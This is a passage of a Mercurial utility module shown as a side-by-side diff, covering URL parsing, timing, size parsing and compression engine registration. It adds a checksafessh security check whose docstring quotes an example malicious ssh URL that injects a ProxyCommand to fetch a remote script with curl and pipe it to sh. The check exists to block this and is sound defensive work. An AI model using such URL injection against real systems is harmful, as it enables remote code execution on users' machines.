2698 path = path[2:]
2699 self.path = path
2699 self.path = path
2700 return
2700 return
2701
2701
2702 if self._matchscheme(path):
2702 if self._matchscheme(path):
2703 parts = path.split(':', 1)
2703 parts = path.split(':', 1)
2704 if parts[0]:
2704 if parts[0]:
2705 self.scheme, path = parts
2705 self.scheme, path = parts
2706 self._localpath = False
2706 self._localpath = False
2707
2707
2708 if not path:
2708 if not path:
2709 path = None
2709 path = None
2710 if self._localpath:
2710 if self._localpath:
2711 self.path = ''
2711 self.path = ''
2712 return
2712 return
2713 else:
2713 else:
2714 if self._localpath:
2714 if self._localpath:
2715 self.path = path
2715 self.path = path
2716 return
2716 return
2717
2717
2718 if parsequery and '?' in path:
2718 if parsequery and '?' in path:
2719 path, self.query = path.split('?', 1)
2719 path, self.query = path.split('?', 1)
2720 if not path:
2720 if not path:
2721 path = None
2721 path = None
2722 if not self.query:
2722 if not self.query:
2723 self.query = None
2723 self.query = None
2724
2724
2725 # // is required to specify a host/authority
2725 # // is required to specify a host/authority
2726 if path and path.startswith('//'):
2726 if path and path.startswith('//'):
2727 parts = path[2:].split('/', 1)
2727 parts = path[2:].split('/', 1)
2728 if len(parts) > 1:
2728 if len(parts) > 1:
2729 self.host, path = parts
2729 self.host, path = parts
2730 else:
2730 else:
2731 self.host = parts[0]
2731 self.host = parts[0]
2732 path = None
2732 path = None
2733 if not self.host:
2733 if not self.host:
2734 self.host = None
2734 self.host = None
2735 # path of file:///d is /d
2735 # path of file:///d is /d
2736 # path of file:///d:/ is d:/, not /d:/
2736 # path of file:///d:/ is d:/, not /d:/
2737 if path and not hasdriveletter(path):
2737 if path and not hasdriveletter(path):
2738 path = '/' + path
2738 path = '/' + path
2739
2739
2740 if self.host and '@' in self.host:
2740 if self.host and '@' in self.host:
2741 self.user, self.host = self.host.rsplit('@', 1)
2741 self.user, self.host = self.host.rsplit('@', 1)
2742 if ':' in self.user:
2742 if ':' in self.user:
2743 self.user, self.passwd = self.user.split(':', 1)
2743 self.user, self.passwd = self.user.split(':', 1)
2744 if not self.host:
2744 if not self.host:
2745 self.host = None
2745 self.host = None
2746
2746
2747 # Don't split on colons in IPv6 addresses without ports
2747 # Don't split on colons in IPv6 addresses without ports
2748 if (self.host and ':' in self.host and
2748 if (self.host and ':' in self.host and
2749 not (self.host.startswith('[') and self.host.endswith(']'))):
2749 not (self.host.startswith('[') and self.host.endswith(']'))):
2750 self._hostport = self.host
2750 self._hostport = self.host
2751 self.host, self.port = self.host.rsplit(':', 1)
2751 self.host, self.port = self.host.rsplit(':', 1)
2752 if not self.host:
2752 if not self.host:
2753 self.host = None
2753 self.host = None
2754
2754
2755 if (self.host and self.scheme == 'file' and
2755 if (self.host and self.scheme == 'file' and
2756 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2756 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2757 raise Abort(_('file:// URLs can only refer to localhost'))
2757 raise Abort(_('file:// URLs can only refer to localhost'))
2758
2758
2759 self.path = path
2759 self.path = path
2760
2760
2761 # leave the query string escaped
2761 # leave the query string escaped
2762 for a in ('user', 'passwd', 'host', 'port',
2762 for a in ('user', 'passwd', 'host', 'port',
2763 'path', 'fragment'):
2763 'path', 'fragment'):
2764 v = getattr(self, a)
2764 v = getattr(self, a)
2765 if v is not None:
2765 if v is not None:
2766 setattr(self, a, urlreq.unquote(v))
2766 setattr(self, a, urlreq.unquote(v))
2767
2767
2768 def __repr__(self):
2768 def __repr__(self):
2769 attrs = []
2769 attrs = []
2770 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2770 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2771 'query', 'fragment'):
2771 'query', 'fragment'):
2772 v = getattr(self, a)
2772 v = getattr(self, a)
2773 if v is not None:
2773 if v is not None:
2774 attrs.append('%s: %r' % (a, v))
2774 attrs.append('%s: %r' % (a, v))
2775 return '<url %s>' % ', '.join(attrs)
2775 return '<url %s>' % ', '.join(attrs)
2776
2776
2777 def __bytes__(self):
2777 def __bytes__(self):
2778 r"""Join the URL's components back into a URL string.
2778 r"""Join the URL's components back into a URL string.
2779
2779
2780 Examples:
2780 Examples:
2781
2781
2782 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2782 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2783 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2783 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2784 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2784 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2785 'http://user:pw@host:80/?foo=bar&baz=42'
2785 'http://user:pw@host:80/?foo=bar&baz=42'
2786 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2786 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2787 'http://user:pw@host:80/?foo=bar%3dbaz'
2787 'http://user:pw@host:80/?foo=bar%3dbaz'
2788 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2788 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2789 'ssh://user:pw@[::1]:2200//home/joe#'
2789 'ssh://user:pw@[::1]:2200//home/joe#'
2790 >>> str(url('http://localhost:80//'))
2790 >>> str(url('http://localhost:80//'))
2791 'http://localhost:80//'
2791 'http://localhost:80//'
2792 >>> str(url('http://localhost:80/'))
2792 >>> str(url('http://localhost:80/'))
2793 'http://localhost:80/'
2793 'http://localhost:80/'
2794 >>> str(url('http://localhost:80'))
2794 >>> str(url('http://localhost:80'))
2795 'http://localhost:80/'
2795 'http://localhost:80/'
2796 >>> str(url('bundle:foo'))
2796 >>> str(url('bundle:foo'))
2797 'bundle:foo'
2797 'bundle:foo'
2798 >>> str(url('bundle://../foo'))
2798 >>> str(url('bundle://../foo'))
2799 'bundle:../foo'
2799 'bundle:../foo'
2800 >>> str(url('path'))
2800 >>> str(url('path'))
2801 'path'
2801 'path'
2802 >>> str(url('file:///tmp/foo/bar'))
2802 >>> str(url('file:///tmp/foo/bar'))
2803 'file:///tmp/foo/bar'
2803 'file:///tmp/foo/bar'
2804 >>> str(url('file:///c:/tmp/foo/bar'))
2804 >>> str(url('file:///c:/tmp/foo/bar'))
2805 'file:///c:/tmp/foo/bar'
2805 'file:///c:/tmp/foo/bar'
2806 >>> print url(r'bundle:foo\bar')
2806 >>> print url(r'bundle:foo\bar')
2807 bundle:foo\bar
2807 bundle:foo\bar
2808 >>> print url(r'file:///D:\data\hg')
2808 >>> print url(r'file:///D:\data\hg')
2809 file:///D:\data\hg
2809 file:///D:\data\hg
2810 """
2810 """
2811 if self._localpath:
2811 if self._localpath:
2812 s = self.path
2812 s = self.path
2813 if self.scheme == 'bundle':
2813 if self.scheme == 'bundle':
2814 s = 'bundle:' + s
2814 s = 'bundle:' + s
2815 if self.fragment:
2815 if self.fragment:
2816 s += '#' + self.fragment
2816 s += '#' + self.fragment
2817 return s
2817 return s
2818
2818
2819 s = self.scheme + ':'
2819 s = self.scheme + ':'
2820 if self.user or self.passwd or self.host:
2820 if self.user or self.passwd or self.host:
2821 s += '//'
2821 s += '//'
2822 elif self.scheme and (not self.path or self.path.startswith('/')
2822 elif self.scheme and (not self.path or self.path.startswith('/')
2823 or hasdriveletter(self.path)):
2823 or hasdriveletter(self.path)):
2824 s += '//'
2824 s += '//'
2825 if hasdriveletter(self.path):
2825 if hasdriveletter(self.path):
2826 s += '/'
2826 s += '/'
2827 if self.user:
2827 if self.user:
2828 s += urlreq.quote(self.user, safe=self._safechars)
2828 s += urlreq.quote(self.user, safe=self._safechars)
2829 if self.passwd:
2829 if self.passwd:
2830 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2830 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2831 if self.user or self.passwd:
2831 if self.user or self.passwd:
2832 s += '@'
2832 s += '@'
2833 if self.host:
2833 if self.host:
2834 if not (self.host.startswith('[') and self.host.endswith(']')):
2834 if not (self.host.startswith('[') and self.host.endswith(']')):
2835 s += urlreq.quote(self.host)
2835 s += urlreq.quote(self.host)
2836 else:
2836 else:
2837 s += self.host
2837 s += self.host
2838 if self.port:
2838 if self.port:
2839 s += ':' + urlreq.quote(self.port)
2839 s += ':' + urlreq.quote(self.port)
2840 if self.host:
2840 if self.host:
2841 s += '/'
2841 s += '/'
2842 if self.path:
2842 if self.path:
2843 # TODO: similar to the query string, we should not unescape the
2843 # TODO: similar to the query string, we should not unescape the
2844 # path when we store it, the path might contain '%2f' = '/',
2844 # path when we store it, the path might contain '%2f' = '/',
2845 # which we should *not* escape.
2845 # which we should *not* escape.
2846 s += urlreq.quote(self.path, safe=self._safepchars)
2846 s += urlreq.quote(self.path, safe=self._safepchars)
2847 if self.query:
2847 if self.query:
2848 # we store the query in escaped form.
2848 # we store the query in escaped form.
2849 s += '?' + self.query
2849 s += '?' + self.query
2850 if self.fragment is not None:
2850 if self.fragment is not None:
2851 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2851 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2852 return s
2852 return s
2853
2853
2854 __str__ = encoding.strmethod(__bytes__)
2854 __str__ = encoding.strmethod(__bytes__)
2855
2855
2856 def authinfo(self):
2856 def authinfo(self):
2857 user, passwd = self.user, self.passwd
2857 user, passwd = self.user, self.passwd
2858 try:
2858 try:
2859 self.user, self.passwd = None, None
2859 self.user, self.passwd = None, None
2860 s = bytes(self)
2860 s = bytes(self)
2861 finally:
2861 finally:
2862 self.user, self.passwd = user, passwd
2862 self.user, self.passwd = user, passwd
2863 if not self.user:
2863 if not self.user:
2864 return (s, None)
2864 return (s, None)
2865 # authinfo[1] is passed to urllib2 password manager, and its
2865 # authinfo[1] is passed to urllib2 password manager, and its
2866 # URIs must not contain credentials. The host is passed in the
2866 # URIs must not contain credentials. The host is passed in the
2867 # URIs list because Python < 2.4.3 uses only that to search for
2867 # URIs list because Python < 2.4.3 uses only that to search for
2868 # a password.
2868 # a password.
2869 return (s, (None, (s, self.host),
2869 return (s, (None, (s, self.host),
2870 self.user, self.passwd or ''))
2870 self.user, self.passwd or ''))
2871
2871
2872 def isabs(self):
2872 def isabs(self):
2873 if self.scheme and self.scheme != 'file':
2873 if self.scheme and self.scheme != 'file':
2874 return True # remote URL
2874 return True # remote URL
2875 if hasdriveletter(self.path):
2875 if hasdriveletter(self.path):
2876 return True # absolute for our purposes - can't be joined()
2876 return True # absolute for our purposes - can't be joined()
2877 if self.path.startswith(br'\\'):
2877 if self.path.startswith(br'\\'):
2878 return True # Windows UNC path
2878 return True # Windows UNC path
2879 if self.path.startswith('/'):
2879 if self.path.startswith('/'):
2880 return True # POSIX-style
2880 return True # POSIX-style
2881 return False
2881 return False
2882
2882
2883 def localpath(self):
2883 def localpath(self):
2884 if self.scheme == 'file' or self.scheme == 'bundle':
2884 if self.scheme == 'file' or self.scheme == 'bundle':
2885 path = self.path or '/'
2885 path = self.path or '/'
2886 # For Windows, we need to promote hosts containing drive
2886 # For Windows, we need to promote hosts containing drive
2887 # letters to paths with drive letters.
2887 # letters to paths with drive letters.
2888 if hasdriveletter(self._hostport):
2888 if hasdriveletter(self._hostport):
2889 path = self._hostport + '/' + self.path
2889 path = self._hostport + '/' + self.path
2890 elif (self.host is not None and self.path
2890 elif (self.host is not None and self.path
2891 and not hasdriveletter(path)):
2891 and not hasdriveletter(path)):
2892 path = '/' + path
2892 path = '/' + path
2893 return path
2893 return path
2894 return self._origpath
2894 return self._origpath
2895
2895
2896 def islocal(self):
2896 def islocal(self):
2897 '''whether localpath will return something that posixfile can open'''
2897 '''whether localpath will return something that posixfile can open'''
2898 return (not self.scheme or self.scheme == 'file'
2898 return (not self.scheme or self.scheme == 'file'
2899 or self.scheme == 'bundle')
2899 or self.scheme == 'bundle')
2900
2900
2901 def hasscheme(path):
2901 def hasscheme(path):
2902 return bool(url(path).scheme)
2902 return bool(url(path).scheme)
2903
2903
2904 def hasdriveletter(path):
2904 def hasdriveletter(path):
2905 return path and path[1:2] == ':' and path[0:1].isalpha()
2905 return path and path[1:2] == ':' and path[0:1].isalpha()
2906
2906
2907 def urllocalpath(path):
2907 def urllocalpath(path):
2908 return url(path, parsequery=False, parsefragment=False).localpath()
2908 return url(path, parsequery=False, parsefragment=False).localpath()
2909
2909
2910 def checksafessh(path):
2911 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2912
2913 This is a sanity check for ssh urls. ssh will parse the first item as
2914 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2915 Let's prevent these potentially exploited urls entirely and warn the
2916 user.
2917
2918 Raises an error.Abort when the url is unsafe.
2919 """
2920 path = urlreq.unquote(path)
2921 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2922 raise error.Abort(_('potentially unsafe url: %r') %
2923 (path,))
2924
2910 def hidepassword(u):
2925 def hidepassword(u):
2911 '''hide user credential in a url string'''
2926 '''hide user credential in a url string'''
2912 u = url(u)
2927 u = url(u)
2913 if u.passwd:
2928 if u.passwd:
2914 u.passwd = '***'
2929 u.passwd = '***'
2915 return bytes(u)
2930 return bytes(u)
2916
2931
2917 def removeauth(u):
2932 def removeauth(u):
2918 '''remove all authentication information from a url string'''
2933 '''remove all authentication information from a url string'''
2919 u = url(u)
2934 u = url(u)
2920 u.user = u.passwd = None
2935 u.user = u.passwd = None
2921 return str(u)
2936 return str(u)
2922
2937
2923 timecount = unitcountfn(
2938 timecount = unitcountfn(
2924 (1, 1e3, _('%.0f s')),
2939 (1, 1e3, _('%.0f s')),
2925 (100, 1, _('%.1f s')),
2940 (100, 1, _('%.1f s')),
2926 (10, 1, _('%.2f s')),
2941 (10, 1, _('%.2f s')),
2927 (1, 1, _('%.3f s')),
2942 (1, 1, _('%.3f s')),
2928 (100, 0.001, _('%.1f ms')),
2943 (100, 0.001, _('%.1f ms')),
2929 (10, 0.001, _('%.2f ms')),
2944 (10, 0.001, _('%.2f ms')),
2930 (1, 0.001, _('%.3f ms')),
2945 (1, 0.001, _('%.3f ms')),
2931 (100, 0.000001, _('%.1f us')),
2946 (100, 0.000001, _('%.1f us')),
2932 (10, 0.000001, _('%.2f us')),
2947 (10, 0.000001, _('%.2f us')),
2933 (1, 0.000001, _('%.3f us')),
2948 (1, 0.000001, _('%.3f us')),
2934 (100, 0.000000001, _('%.1f ns')),
2949 (100, 0.000000001, _('%.1f ns')),
2935 (10, 0.000000001, _('%.2f ns')),
2950 (10, 0.000000001, _('%.2f ns')),
2936 (1, 0.000000001, _('%.3f ns')),
2951 (1, 0.000000001, _('%.3f ns')),
2937 )
2952 )
2938
2953
2939 _timenesting = [0]
2954 _timenesting = [0]
2940
2955
2941 def timed(func):
2956 def timed(func):
2942 '''Report the execution time of a function call to stderr.
2957 '''Report the execution time of a function call to stderr.
2943
2958
2944 During development, use as a decorator when you need to measure
2959 During development, use as a decorator when you need to measure
2945 the cost of a function, e.g. as follows:
2960 the cost of a function, e.g. as follows:
2946
2961
2947 @util.timed
2962 @util.timed
2948 def foo(a, b, c):
2963 def foo(a, b, c):
2949 pass
2964 pass
2950 '''
2965 '''
2951
2966
2952 def wrapper(*args, **kwargs):
2967 def wrapper(*args, **kwargs):
2953 start = timer()
2968 start = timer()
2954 indent = 2
2969 indent = 2
2955 _timenesting[0] += indent
2970 _timenesting[0] += indent
2956 try:
2971 try:
2957 return func(*args, **kwargs)
2972 return func(*args, **kwargs)
2958 finally:
2973 finally:
2959 elapsed = timer() - start
2974 elapsed = timer() - start
2960 _timenesting[0] -= indent
2975 _timenesting[0] -= indent
2961 stderr.write('%s%s: %s\n' %
2976 stderr.write('%s%s: %s\n' %
2962 (' ' * _timenesting[0], func.__name__,
2977 (' ' * _timenesting[0], func.__name__,
2963 timecount(elapsed)))
2978 timecount(elapsed)))
2964 return wrapper
2979 return wrapper
2965
2980
2966 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2981 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2967 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2982 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2968
2983
2969 def sizetoint(s):
2984 def sizetoint(s):
2970 '''Convert a space specifier to a byte count.
2985 '''Convert a space specifier to a byte count.
2971
2986
2972 >>> sizetoint('30')
2987 >>> sizetoint('30')
2973 30
2988 30
2974 >>> sizetoint('2.2kb')
2989 >>> sizetoint('2.2kb')
2975 2252
2990 2252
2976 >>> sizetoint('6M')
2991 >>> sizetoint('6M')
2977 6291456
2992 6291456
2978 '''
2993 '''
2979 t = s.strip().lower()
2994 t = s.strip().lower()
2980 try:
2995 try:
2981 for k, u in _sizeunits:
2996 for k, u in _sizeunits:
2982 if t.endswith(k):
2997 if t.endswith(k):
2983 return int(float(t[:-len(k)]) * u)
2998 return int(float(t[:-len(k)]) * u)
2984 return int(t)
2999 return int(t)
2985 except ValueError:
3000 except ValueError:
2986 raise error.ParseError(_("couldn't parse size: %s") % s)
3001 raise error.ParseError(_("couldn't parse size: %s") % s)
2987
3002
2988 class hooks(object):
3003 class hooks(object):
2989 '''A collection of hook functions that can be used to extend a
3004 '''A collection of hook functions that can be used to extend a
2990 function's behavior. Hooks are called in lexicographic order,
3005 function's behavior. Hooks are called in lexicographic order,
2991 based on the names of their sources.'''
3006 based on the names of their sources.'''
2992
3007
2993 def __init__(self):
3008 def __init__(self):
2994 self._hooks = []
3009 self._hooks = []
2995
3010
2996 def add(self, source, hook):
3011 def add(self, source, hook):
2997 self._hooks.append((source, hook))
3012 self._hooks.append((source, hook))
2998
3013
2999 def __call__(self, *args):
3014 def __call__(self, *args):
3000 self._hooks.sort(key=lambda x: x[0])
3015 self._hooks.sort(key=lambda x: x[0])
3001 results = []
3016 results = []
3002 for source, hook in self._hooks:
3017 for source, hook in self._hooks:
3003 results.append(hook(*args))
3018 results.append(hook(*args))
3004 return results
3019 return results
3005
3020
3006 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3021 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3007 '''Yields lines for a nicely formatted stacktrace.
3022 '''Yields lines for a nicely formatted stacktrace.
3008 Skips the 'skip' last entries, then return the last 'depth' entries.
3023 Skips the 'skip' last entries, then return the last 'depth' entries.
3009 Each file+linenumber is formatted according to fileline.
3024 Each file+linenumber is formatted according to fileline.
3010 Each line is formatted according to line.
3025 Each line is formatted according to line.
3011 If line is None, it yields:
3026 If line is None, it yields:
3012 length of longest filepath+line number,
3027 length of longest filepath+line number,
3013 filepath+linenumber,
3028 filepath+linenumber,
3014 function
3029 function
3015
3030
3016 Not be used in production code but very convenient while developing.
3031 Not be used in production code but very convenient while developing.
3017 '''
3032 '''
3018 entries = [(fileline % (fn, ln), func)
3033 entries = [(fileline % (fn, ln), func)
3019 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3034 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3020 ][-depth:]
3035 ][-depth:]
3021 if entries:
3036 if entries:
3022 fnmax = max(len(entry[0]) for entry in entries)
3037 fnmax = max(len(entry[0]) for entry in entries)
3023 for fnln, func in entries:
3038 for fnln, func in entries:
3024 if line is None:
3039 if line is None:
3025 yield (fnmax, fnln, func)
3040 yield (fnmax, fnln, func)
3026 else:
3041 else:
3027 yield line % (fnmax, fnln, func)
3042 yield line % (fnmax, fnln, func)
3028
3043
3029 def debugstacktrace(msg='stacktrace', skip=0,
3044 def debugstacktrace(msg='stacktrace', skip=0,
3030 f=stderr, otherf=stdout, depth=0):
3045 f=stderr, otherf=stdout, depth=0):
3031 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3046 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3032 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3047 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3033 By default it will flush stdout first.
3048 By default it will flush stdout first.
3034 It can be used everywhere and intentionally does not require an ui object.
3049 It can be used everywhere and intentionally does not require an ui object.
3035 Not be used in production code but very convenient while developing.
3050 Not be used in production code but very convenient while developing.
3036 '''
3051 '''
3037 if otherf:
3052 if otherf:
3038 otherf.flush()
3053 otherf.flush()
3039 f.write('%s at:\n' % msg.rstrip())
3054 f.write('%s at:\n' % msg.rstrip())
3040 for line in getstackframes(skip + 1, depth=depth):
3055 for line in getstackframes(skip + 1, depth=depth):
3041 f.write(line)
3056 f.write(line)
3042 f.flush()
3057 f.flush()
3043
3058
3044 class dirs(object):
3059 class dirs(object):
3045 '''a multiset of directory names from a dirstate or manifest'''
3060 '''a multiset of directory names from a dirstate or manifest'''
3046
3061
3047 def __init__(self, map, skip=None):
3062 def __init__(self, map, skip=None):
3048 self._dirs = {}
3063 self._dirs = {}
3049 addpath = self.addpath
3064 addpath = self.addpath
3050 if safehasattr(map, 'iteritems') and skip is not None:
3065 if safehasattr(map, 'iteritems') and skip is not None:
3051 for f, s in map.iteritems():
3066 for f, s in map.iteritems():
3052 if s[0] != skip:
3067 if s[0] != skip:
3053 addpath(f)
3068 addpath(f)
3054 else:
3069 else:
3055 for f in map:
3070 for f in map:
3056 addpath(f)
3071 addpath(f)
3057
3072
3058 def addpath(self, path):
3073 def addpath(self, path):
3059 dirs = self._dirs
3074 dirs = self._dirs
3060 for base in finddirs(path):
3075 for base in finddirs(path):
3061 if base in dirs:
3076 if base in dirs:
3062 dirs[base] += 1
3077 dirs[base] += 1
3063 return
3078 return
3064 dirs[base] = 1
3079 dirs[base] = 1
3065
3080
3066 def delpath(self, path):
3081 def delpath(self, path):
3067 dirs = self._dirs
3082 dirs = self._dirs
3068 for base in finddirs(path):
3083 for base in finddirs(path):
3069 if dirs[base] > 1:
3084 if dirs[base] > 1:
3070 dirs[base] -= 1
3085 dirs[base] -= 1
3071 return
3086 return
3072 del dirs[base]
3087 del dirs[base]
3073
3088
3074 def __iter__(self):
3089 def __iter__(self):
3075 return iter(self._dirs)
3090 return iter(self._dirs)
3076
3091
3077 def __contains__(self, d):
3092 def __contains__(self, d):
3078 return d in self._dirs
3093 return d in self._dirs
3079
3094
3080 if safehasattr(parsers, 'dirs'):
3095 if safehasattr(parsers, 'dirs'):
3081 dirs = parsers.dirs
3096 dirs = parsers.dirs
3082
3097
3083 def finddirs(path):
3098 def finddirs(path):
3084 pos = path.rfind('/')
3099 pos = path.rfind('/')
3085 while pos != -1:
3100 while pos != -1:
3086 yield path[:pos]
3101 yield path[:pos]
3087 pos = path.rfind('/', 0, pos)
3102 pos = path.rfind('/', 0, pos)
3088
3103
3089 # compression code
3104 # compression code
3090
3105
3091 SERVERROLE = 'server'
3106 SERVERROLE = 'server'
3092 CLIENTROLE = 'client'
3107 CLIENTROLE = 'client'
3093
3108
3094 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3109 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3095 (u'name', u'serverpriority',
3110 (u'name', u'serverpriority',
3096 u'clientpriority'))
3111 u'clientpriority'))
3097
3112
3098 class compressormanager(object):
3113 class compressormanager(object):
3099 """Holds registrations of various compression engines.
3114 """Holds registrations of various compression engines.
3100
3115
3101 This class essentially abstracts the differences between compression
3116 This class essentially abstracts the differences between compression
3102 engines to allow new compression formats to be added easily, possibly from
3117 engines to allow new compression formats to be added easily, possibly from
3103 extensions.
3118 extensions.
3104
3119
3105 Compressors are registered against the global instance by calling its
3120 Compressors are registered against the global instance by calling its
3106 ``register()`` method.
3121 ``register()`` method.
3107 """
3122 """
3108 def __init__(self):
3123 def __init__(self):
3109 self._engines = {}
3124 self._engines = {}
3110 # Bundle spec human name to engine name.
3125 # Bundle spec human name to engine name.
3111 self._bundlenames = {}
3126 self._bundlenames = {}
3112 # Internal bundle identifier to engine name.
3127 # Internal bundle identifier to engine name.
3113 self._bundletypes = {}
3128 self._bundletypes = {}
3114 # Revlog header to engine name.
3129 # Revlog header to engine name.
3115 self._revlogheaders = {}
3130 self._revlogheaders = {}
3116 # Wire proto identifier to engine name.
3131 # Wire proto identifier to engine name.
3117 self._wiretypes = {}
3132 self._wiretypes = {}
3118
3133
3119 def __getitem__(self, key):
3134 def __getitem__(self, key):
3120 return self._engines[key]
3135 return self._engines[key]
3121
3136
3122 def __contains__(self, key):
3137 def __contains__(self, key):
3123 return key in self._engines
3138 return key in self._engines
3124
3139
3125 def __iter__(self):
3140 def __iter__(self):
3126 return iter(self._engines.keys())
3141 return iter(self._engines.keys())
3127
3142
3128 def register(self, engine):
3143 def register(self, engine):
3129 """Register a compression engine with the manager.
3144 """Register a compression engine with the manager.
3130
3145
3131 The argument must be a ``compressionengine`` instance.
3146 The argument must be a ``compressionengine`` instance.
3132 """
3147 """
3133 if not isinstance(engine, compressionengine):
3148 if not isinstance(engine, compressionengine):
3134 raise ValueError(_('argument must be a compressionengine'))
3149 raise ValueError(_('argument must be a compressionengine'))
3135
3150
3136 name = engine.name()
3151 name = engine.name()
3137
3152
3138 if name in self._engines:
3153 if name in self._engines:
3139 raise error.Abort(_('compression engine %s already registered') %
3154 raise error.Abort(_('compression engine %s already registered') %
3140 name)
3155 name)
3141
3156
3142 bundleinfo = engine.bundletype()
3157 bundleinfo = engine.bundletype()
3143 if bundleinfo:
3158 if bundleinfo:
3144 bundlename, bundletype = bundleinfo
3159 bundlename, bundletype = bundleinfo
3145
3160
3146 if bundlename in self._bundlenames:
3161 if bundlename in self._bundlenames:
3147 raise error.Abort(_('bundle name %s already registered') %
3162 raise error.Abort(_('bundle name %s already registered') %
3148 bundlename)
3163 bundlename)
3149 if bundletype in self._bundletypes:
3164 if bundletype in self._bundletypes:
3150 raise error.Abort(_('bundle type %s already registered by %s') %
3165 raise error.Abort(_('bundle type %s already registered by %s') %
3151 (bundletype, self._bundletypes[bundletype]))
3166 (bundletype, self._bundletypes[bundletype]))
3152
3167
3153 # No external facing name declared.
3168 # No external facing name declared.
3154 if bundlename:
3169 if bundlename:
3155 self._bundlenames[bundlename] = name
3170 self._bundlenames[bundlename] = name
3156
3171
3157 self._bundletypes[bundletype] = name
3172 self._bundletypes[bundletype] = name
3158
3173
3159 wiresupport = engine.wireprotosupport()
3174 wiresupport = engine.wireprotosupport()
3160 if wiresupport:
3175 if wiresupport:
3161 wiretype = wiresupport.name
3176 wiretype = wiresupport.name
3162 if wiretype in self._wiretypes:
3177 if wiretype in self._wiretypes:
3163 raise error.Abort(_('wire protocol compression %s already '
3178 raise error.Abort(_('wire protocol compression %s already '
3164 'registered by %s') %
3179 'registered by %s') %
3165 (wiretype, self._wiretypes[wiretype]))
3180 (wiretype, self._wiretypes[wiretype]))
3166
3181
3167 self._wiretypes[wiretype] = name
3182 self._wiretypes[wiretype] = name
3168
3183
3169 revlogheader = engine.revlogheader()
3184 revlogheader = engine.revlogheader()
3170 if revlogheader and revlogheader in self._revlogheaders:
3185 if revlogheader and revlogheader in self._revlogheaders:
3171 raise error.Abort(_('revlog header %s already registered by %s') %
3186 raise error.Abort(_('revlog header %s already registered by %s') %
3172 (revlogheader, self._revlogheaders[revlogheader]))
3187 (revlogheader, self._revlogheaders[revlogheader]))
3173
3188
3174 if revlogheader:
3189 if revlogheader:
3175 self._revlogheaders[revlogheader] = name
3190 self._revlogheaders[revlogheader] = name
3176
3191
3177 self._engines[name] = engine
3192 self._engines[name] = engine
3178
3193
3179 @property
3194 @property
3180 def supportedbundlenames(self):
3195 def supportedbundlenames(self):
3181 return set(self._bundlenames.keys())
3196 return set(self._bundlenames.keys())
3182
3197
3183 @property
3198 @property
3184 def supportedbundletypes(self):
3199 def supportedbundletypes(self):
3185 return set(self._bundletypes.keys())
3200 return set(self._bundletypes.keys())
3186
3201
3187 def forbundlename(self, bundlename):
3202 def forbundlename(self, bundlename):
3188 """Obtain a compression engine registered to a bundle name.
3203 """Obtain a compression engine registered to a bundle name.
3189
3204
3190 Will raise KeyError if the bundle type isn't registered.
3205 Will raise KeyError if the bundle type isn't registered.
3191
3206
3192 Will abort if the engine is known but not available.
3207 Will abort if the engine is known but not available.
3193 """
3208 """
3194 engine = self._engines[self._bundlenames[bundlename]]
3209 engine = self._engines[self._bundlenames[bundlename]]
3195 if not engine.available():
3210 if not engine.available():
3196 raise error.Abort(_('compression engine %s could not be loaded') %
3211 raise error.Abort(_('compression engine %s could not be loaded') %
3197 engine.name())
3212 engine.name())
3198 return engine
3213 return engine
3199
3214
3200 def forbundletype(self, bundletype):
3215 def forbundletype(self, bundletype):
3201 """Obtain a compression engine registered to a bundle type.
3216 """Obtain a compression engine registered to a bundle type.
3202
3217
3203 Will raise KeyError if the bundle type isn't registered.
3218 Will raise KeyError if the bundle type isn't registered.
3204
3219
3205 Will abort if the engine is known but not available.
3220 Will abort if the engine is known but not available.
3206 """
3221 """
3207 engine = self._engines[self._bundletypes[bundletype]]
3222 engine = self._engines[self._bundletypes[bundletype]]
3208 if not engine.available():
3223 if not engine.available():
3209 raise error.Abort(_('compression engine %s could not be loaded') %
3224 raise error.Abort(_('compression engine %s could not be loaded') %
3210 engine.name())
3225 engine.name())
3211 return engine
3226 return engine
3212
3227
3213 def supportedwireengines(self, role, onlyavailable=True):
3228 def supportedwireengines(self, role, onlyavailable=True):
3214 """Obtain compression engines that support the wire protocol.
3229 """Obtain compression engines that support the wire protocol.
3215
3230
3216 Returns a list of engines in prioritized order, most desired first.
3231 Returns a list of engines in prioritized order, most desired first.
3217
3232
3218 If ``onlyavailable`` is set, filter out engines that can't be
3233 If ``onlyavailable`` is set, filter out engines that can't be
3219 loaded.
3234 loaded.
3220 """
3235 """
3221 assert role in (SERVERROLE, CLIENTROLE)
